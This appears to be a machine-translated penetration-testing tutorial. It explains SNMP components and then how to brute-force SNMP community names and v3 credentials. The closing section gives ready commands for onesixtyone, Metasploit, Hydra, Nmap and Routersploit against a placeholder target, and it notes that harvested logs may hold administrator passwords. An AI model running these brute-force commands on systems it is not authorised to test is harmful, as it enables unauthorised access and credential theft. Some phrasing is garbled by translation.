Blasting Network Management Protocol (SNMP)

Introduction to SNMP

Simple Network Management Protocol (SNMP), consisting of a set of network management standards, contains an application layer protocol, a database schema, and a set of data objects. The protocol can support network management systems to monitor whether devices connected to the network have any administrative concerns. The protocol is part of the internet protocol suite defined by the Internet Engineering Task Force (IETF).

SNMP basic components

An SNMP-managed network consists of the following three key components:

• Network management systems (NMSs, Network-management systems)
• Managed device (managed device)
• The agent (agent)

A network management system runs an application that monitors and controls the managed devices. Also known as the management entity, the network administrator interacts with the network device. The network management system provides a large amount of computing and memory resources required for network management. A managed network may have more than one network management system.

A managed device is a network node that contains an SNMP agent that resides in a managed network. The managed device collects and stores management information through the Management Information Base (MIB) and allows the network management system to obtain this information through the SNMP agent.

An agent is a network management software module that resides in a managed device. The agent controls the management information of the local machine and sends this information in SNMP-compatible format.

Blasting SNMP

Many people may ask, through the SNMP I can get to what information? What does blasting SNMP do? The last is how blasting?

What information does SNMP have?

• Monitoring device uptime (sysUpTimeInstance)
• Operating system version list (sysDescr)
• Collects interface information (ifName, ifDescr, ifSpeed, ifType, ifPhysAddr)
• Measures Network Interface Throughput (ifInOctets, ifOutOctets)
• Querying Remote ARP Cache (ipNetToMedia)

These information are very valuable information in the infiltration of the information collection stage.

In addition, some devices will log will exist in the MIB table, and the log often there will be some useful information, such as the administrator may log in when the output password, then we can log to get to the administrator’s account And similar passwords.

What does blasting SNMP do?

In SNMP v1 and v2 SNMP agents and SNMP managers rely on community names for authentication, and the default community name is “public”. Where the community name is often said that the SNMP password, but the actual is not a password.

To SNMP v3, in order to enhance the security to increase the real authentication function, began to support based on the user name / password authentication.

Therefore, v1 and v2 is the blasting group name, and v3 is the blasting user name / password. Of course, I encountered a lot of still remain in the former, so the following blasting or blasting group name.

How blasting?

Of course, is the use of tools, the following five can be used to blasting SNMP community name tools.

Onesixtyone

Onesixtyone is a snmp scanning tool designed to find the SNMP community name on the device.

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt  <Target> -w 100  

Metasploit

The famous Metasploit of course can also be used to blasting SNMP community name, nothing good to explain, look directly at the command:

msf> use auxiliary/scanner/snmp/snmp_login  
msf auxiliary(snmp_login) > set RHOSTS <Target>  
msf auxiliary(snmp_login) > set STOP_ON_SUCCESS true  
msf auxiliary(snmp_login) > run  

Hydia

Mentioned how blasting can get Hydia less.

hydra -P pass.txt  <Target> snmp  

Nmap

Nmap is more than just a port scanning tool.

nmap -sU -v --script snmp-brute --script-args passdb=passwords.lst <Target>  
nmap -sU -v --script snmp-brute --script-args userdb=usernames.lst,passdb=passwords.lst <Target>  

Routersploit

RouteSploit framework is an open source vulnerability detection and use of the framework, the object is mainly for routers and other embedded devices. It also includes modules that can be used to burst SNMP community names.

rsf > use creds/snmp_bruteforce  
rsf (SNMP Bruteforce) > set target <Target>  
[+] {'target': '172.16.18.156'}
rsf (SNMP Bruteforce) > run